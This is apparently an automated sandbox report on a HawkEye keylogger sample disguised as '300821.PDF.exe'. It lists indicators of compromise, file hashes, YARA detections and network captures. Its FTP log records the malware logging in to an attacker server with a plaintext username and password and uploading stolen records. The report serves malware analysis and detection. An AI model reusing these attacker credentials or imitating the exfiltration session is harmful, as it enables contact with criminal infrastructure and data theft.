                      https://aefd.nelreports.net/api/report?cat=bingrms | 0% | URL Reputation | safe
                      http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Z | 0% | Avira URL Cloud | safe
                      http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
                      http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | URL Reputation | safe
                      http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                      https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG | 0% | Avira URL Cloud | safe
                      http://www.typography.netD | 0% | URL Reputation | safe
                      http://fontfabrik.com | 0% | URL Reputation | safe
                      http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM | 0% | Avira URL Cloud | safe
                      http://www.sandoll.co.kr | 0% | URL Reputation | safe
                      https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ | 0% | URL Reputation | safe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | 0% | URL Reputation | safe
                      http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                      https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js | 0% | URL Reputation | safe
                      http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg | 0% | URL Reputation | safe
                      https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e | 0% | Avira URL Cloud | safe
                      https://logincdn.msauth.net/16.000.28230.00/ConvergedLogin_PCore.js | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      ftp.vn-gpack.org | 66.70.204.222 | true | true | | unknown
                      240.163.3.0.in-addr.arpa | unknown | unknown | false | | unknown

URLs from Memory and Binaries


Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
66.70.204.222 | ftp.vn-gpack.org | Canada | 16276 | OVHFR | true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 473673
Start date: 30.08.2021
Start time: 06:54:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 54s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 300821.PDF.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@7/5@2/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 98.9% (good quality ratio 95.9%)
• Quality average: 85.6%
• Quality standard deviation: 23.2%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.80.193, 51.104.136.2, 204.79.197.222, 20.82.210.154, 20.75.105.140, 40.112.88.60, 80.67.82.235, 80.67.82.211
• Excluded domains from analysis (whitelisted): fp.msedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, a-0019.a-msedge.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, go.microsoft.com, a-0019.standard.a-msedge.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
06:55:04 | API Interceptor | 6x Sleep call for process: 300821.PDF.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
66.70.204.222 | Dolmas.xlsm.exe | malicious | tesla-com.tk/Awele/SINOPHIL@LOKIRAW_HGiTKz109.bin
66.70.204.222 | eurobank.pdf.exe | malicious | tesla-com.tk/ford/SINOPHIL@LOKIRAW_GCLYOSF135.bin

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context
OVHFR | sx5Yixa5GO.exe | malicious | 158.69.65.151
OVHFR | fzUNUBx4wC.exe | malicious | 158.69.65.151
OVHFR | DpO9nEw19q.exe | malicious | 158.69.65.151
OVHFR | d6Q0sXQjkY.exe | malicious | 158.69.65.151
OVHFR | VoFsQd7jwx.exe | malicious | 158.69.65.151
OVHFR | waKnA3vFb3 | malicious | 79.137.66.196
OVHFR | xQDLIutCAU.exe | malicious | 158.69.65.151
OVHFR | io9rjV248Z.exe | malicious | 158.69.65.151
OVHFR | LeSA7F7a96.exe | malicious | 158.69.65.151
OVHFR | loligang.arm | malicious | 92.246.246.95
OVHFR | sG41vsm1Pe.exe | malicious | 158.69.65.151
OVHFR | 0tLYXVrJOe.exe | malicious | 158.69.65.151
OVHFR | RyGaFxV75v.exe | malicious | 158.69.65.151
OVHFR | uvVLne3r48.exe | malicious | 158.69.65.151
OVHFR | gMWaIDKK37.exe | malicious | 158.69.65.151
OVHFR | hsRrR2KPY7.exe | malicious | 158.69.65.151
OVHFR | pCSou0ozZy.exe | malicious | 158.69.65.151
OVHFR | ZUd8KSXXVD.exe | malicious | 158.69.65.151
OVHFR | FWXckJ56fn.exe | malicious | 158.69.65.151
OVHFR | k2vbB70cV7.exe | malicious | 158.69.65.151

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\300821.PDF.exe.log
Process: C:\Users\user\Desktop\300821.PDF.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\bhvE2B1.tmp
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x6c81e4e3, page size 32768, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 29884416
Entropy (8bit): 1.0563745804808284
Encrypted: false
SSDEEP: 24576:GjbVPt8HVmyvYw781dfXy7R4aUpPX7Cr6f63rsLOZgv:8NyvArO0v
MD5: AB607EDB401FC1704B6A7FA5E5208D71
SHA1: 747438185721FADCD454E338D8F5B45E47D56336
SHA-256: D4786F79983EDE99BE61190781F57AF3A290175F890D3CB09CB2F963A20BACFF
SHA-512: 7B7490EDD7BFD6E3B86BCCFB463EF67D072DABBE894678337A5F047316A0FBD542CC215B30A61915F383F102CF5E8AE69A992A7296D2EDE536A78CD7C29CF910
Malicious: false
Reputation: low
Preview: l...... ........?......_e..*....w......................^.8.....;#...xE.-6...yQ.h.:.........................b...*....w..............................................................................................{............B.................................................................................................................. .......36...y........................................................................................................................................................................................................................................AI.7...y......................7...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                    Preview: ..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\pid.txt
                                                                                                                                                                    Process:C:\Users\user\Desktop\300821.PDF.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                    Entropy (8bit):1.5
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Dd:B
                                                                                                                                                                    MD5:5A2756A3CB9CDE852CAD3C97E120B656
                                                                                                                                                                    SHA1:1BA65BC81EE7D284E60782ECD3308EC517B73B82
                                                                                                                                                                    SHA-256:95F180E417E425F00E97C5A95BFE534C0B1C90D9D8115C9ACAD2C04C8D6CB246
                                                                                                                                                                    SHA-512:06BFD8C0391AB013E57F0B422A2AFDF73C810ABC0AFFE45717EAAA5FD68F0BCDA8D26D42F6B064D693951C9C481E466393DA2020D2F82F898EF84BB343516F74
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: 2848
                                                                                                                                                                    C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                                                                                                    Process:C:\Users\user\Desktop\300821.PDF.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):37
                                                                                                                                                                    Entropy (8bit):4.247030650103631
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:oNt+WfWWVEXoA:oNwvWVmoA
                                                                                                                                                                    MD5:132D6BAEE131E302BCF347807AA06DE3
                                                                                                                                                                    SHA1:0CC45AF10E562B4D26A27A5B6731FCFCC7DC6F01
                                                                                                                                                                    SHA-256:9DE550232E6E9D639391A3D4A1E7A8B3F745B822D43856C562F5DD7439F5EB93
                                                                                                                                                                    SHA-512:C32670ADCB6E052B3909B9837E7BDD72E89BBEA23B806B16E44C49486EF92A795DED85880D15E836088D1EF80F1D5556B03E5A7CC0B0ACE80844677CFF7E2D9E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview: C:\Users\user\Desktop\300821.PDF.exe

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.076704069722482
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    File name:300821.PDF.exe
                                                                                                                                                                    File size:987136
                                                                                                                                                                    MD5:ddfc57b8fd3e5e0f81dee8ead0e38518
                                                                                                                                                                    SHA1:ca35000ed1844f30e932d8903633e4beb519967f
                                                                                                                                                                    SHA256:c1cd0692836798f5cb7e9335f4547a2650b77cf456193cbe7e384906a20c0603
                                                                                                                                                                    SHA512:083bc3c27ddefbf541b91ef71728a2e3831563be171f4d7ca63dea9e04357533d2bf345c7ccdced551cc8220826d79f894b43f1de2ae8d3fd17a39c1bf838fcc
                                                                                                                                                                    SSDEEP:12288:MeTvtJpA3OXv2BFokZRhXQ5TZaRPlPO0E09wrp:MeDtJSO/2ffxA5TZaP20Eh9
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....",a..............0..............$... ........@.. ....................................@................................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:00828e8e8686b000

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Snort IDS Alerts

Timestamp                | Protocol | SID     | Message                         | Source Port | Dest Port | Source IP   | Dest IP
08/30/21-06:55:26.317879 | TCP      | 2020410 | ET TROJAN HawkEye Keylogger FTP | 49723       | 21        | 192.168.2.4 | 66.70.204.222

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

Timestamp                          | Source Port | Dest Port | Source IP     | Dest IP
Aug 30, 2021 06:55:25.340967894 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:25.447432995 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:25.447601080 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:25.554527044 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:25.555402994 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:25.661679983 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:25.661725044 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:25.661969900 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:25.780798912 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:25.781213999 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:25.887681007 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:25.888890028 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:25.995340109 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:25.995663881 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.102369070 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:26.102632046 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.209256887 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:26.210165024 CEST | 49724 | 51945 | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.256638050 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.317151070 CEST | 51945 | 49724 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:26.317302942 CEST | 49724 | 51945 | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.317878962 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.427908897 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:26.428318977 CEST | 49724 | 51945 | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.430119991 CEST | 49724 | 51945 | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.431380033 CEST | 49724 | 51945 | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.475378990 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.535387039 CEST | 51945 | 49724 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:26.537137985 CEST | 51945 | 49724 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:26.538290977 CEST | 51945 | 49724 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:26.538450003 CEST | 49724 | 51945 | 192.168.2.4   | 66.70.204.222
Aug 30, 2021 06:55:26.541986942 CEST | 21    | 49723 | 66.70.204.222 | 192.168.2.4
Aug 30, 2021 06:55:26.584933996 CEST | 49723 | 21    | 192.168.2.4   | 66.70.204.222

                                                                                                                                                                    UDP Packets

Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
Aug 30, 2021 06:54:52.726234913 CEST | 49714 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:54:52.760011911 CEST | 53    | 49714 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:07.221765995 CEST | 58028 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:07.264961958 CEST | 53    | 58028 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:07.652231932 CEST | 53097 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:07.696250916 CEST | 53    | 53097 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:09.080276966 CEST | 49257 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:09.113172054 CEST | 53    | 49257 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:17.927989006 CEST | 53157 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:17.953084946 CEST | 53    | 53157 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:23.849796057 CEST | 62389 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:23.882658958 CEST | 53    | 62389 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:25.124269009 CEST | 49910 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:25.328469038 CEST | 53    | 49910 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:37.930924892 CEST | 55854 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:38.003427029 CEST | 53    | 55854 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:38.803896904 CEST | 64549 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:38.836663961 CEST | 53    | 64549 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:39.198126078 CEST | 63153 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:39.239734888 CEST | 53    | 63153 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:39.673118114 CEST | 52991 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:39.705575943 CEST | 53    | 52991 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:40.531435966 CEST | 53700 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:40.566447020 CEST | 53    | 53700 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:41.525831938 CEST | 51726 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:41.555313110 CEST | 53    | 51726 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:42.293961048 CEST | 56794 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:42.329674006 CEST | 53    | 56794 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:43.149346113 CEST | 56534 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:43.182962894 CEST | 53    | 56534 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:44.341959953 CEST | 56627 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:44.381015062 CEST | 53    | 56627 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:45.454276085 CEST | 56621 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:45.488651991 CEST | 53    | 56621 | 8.8.8.8     | 192.168.2.4
Aug 30, 2021 06:55:46.417253971 CEST | 63116 | 53    | 192.168.2.4 | 8.8.8.8
Aug 30, 2021 06:55:46.450968027 CEST | 53    | 63116 | 8.8.8.8     | 192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:57.807853937 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:57.854103088 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:55:58.032663107 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:55:58.077951908 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:56:00.492620945 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:56:00.525834084 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:56:33.627084017 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:56:33.662800074 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                    Aug 30, 2021 06:56:37.758372068 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                    Aug 30, 2021 06:56:37.790934086 CEST53615228.8.8.8192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 30, 2021 06:55:09.080276966 CEST | 192.168.2.4 | 8.8.8.8 | 0x9257 | Standard query (0) | 240.163.3.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 30, 2021 06:55:25.124269009 CEST | 192.168.2.4 | 8.8.8.8 | 0xc7d5 | Standard query (0) | ftp.vn-gpack.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 30, 2021 06:55:09.113172054 CEST | 8.8.8.8 | 192.168.2.4 | 0x9257 | Name error (3) | 240.163.3.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Aug 30, 2021 06:55:17.953084946 CEST | 8.8.8.8 | 192.168.2.4 | 0x52b2 | No error (0) | a-0019.a.dns.azurefd.net | a-0019.standard.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 30, 2021 06:55:25.328469038 CEST | 8.8.8.8 | 192.168.2.4 | 0xc7d5 | No error (0) | ftp.vn-gpack.org |  | 66.70.204.222 | A (IP address) | IN (0x0001)

FTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Aug 30, 2021 06:55:25.554527044 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
 |  |  |  |  | 220-You are user number 5 of 50 allowed.
 |  |  |  |  | 220-Local time is now 08:55. Server port: 21.
 |  |  |  |  | 220-This is a private system - No anonymous login
 |  |  |  |  | 220-IPv6 connections are also welcome on this server.
 |  |  |  |  | 220 You will be disconnected after 15 minutes of inactivity.
Aug 30, 2021 06:55:25.555402994 CEST | 49723 | 21 | 192.168.2.4 | 66.70.204.222 | USER Nwwwlooggs@vn-gpack.org
Aug 30, 2021 06:55:25.661725044 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 331 User Nwwwlooggs@vn-gpack.org OK. Password required
Aug 30, 2021 06:55:25.661969900 CEST | 49723 | 21 | 192.168.2.4 | 66.70.204.222 | PASS @!V8[3L!PsE1
Aug 30, 2021 06:55:25.780798912 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 230 OK. Current restricted directory is /
Aug 30, 2021 06:55:25.887681007 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 504 Unknown command
Aug 30, 2021 06:55:25.888890028 CEST | 49723 | 21 | 192.168.2.4 | 66.70.204.222 | PWD
Aug 30, 2021 06:55:25.995340109 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 257 "/" is your current location
Aug 30, 2021 06:55:25.995663881 CEST | 49723 | 21 | 192.168.2.4 | 66.70.204.222 | TYPE I
Aug 30, 2021 06:55:26.102369070 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 200 TYPE is now 8-bit binary
Aug 30, 2021 06:55:26.102632046 CEST | 49723 | 21 | 192.168.2.4 | 66.70.204.222 | PASV
Aug 30, 2021 06:55:26.209256887 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 227 Entering Passive Mode (66,70,204,222,202,233)
Aug 30, 2021 06:55:26.317878962 CEST | 49723 | 21 | 192.168.2.4 | 66.70.204.222 | STOR HawkEye_Keylogger_Stealer_Records_238576 8.30.2021 7:03:04 AM.txt
Aug 30, 2021 06:55:26.427908897 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 150 Accepted data connection
Aug 30, 2021 06:55:26.541986942 CEST | 21 | 49723 | 66.70.204.222 | 192.168.2.4 | 226-File successfully transferred
 |  |  |  |  | 226 0.114 seconds (measured here), 13.08 Kbytes per second

Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 06:54:57
Start date: 30/08/2021
Path: C:\Users\user\Desktop\300821.PDF.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\300821.PDF.exe'
Imagebase: 0xa60000
File size: 987136 bytes
MD5 hash: DDFC57B8FD3E5E0F81DEE8EAD0E38518
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp, Author: Joe Security
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: Joe Security
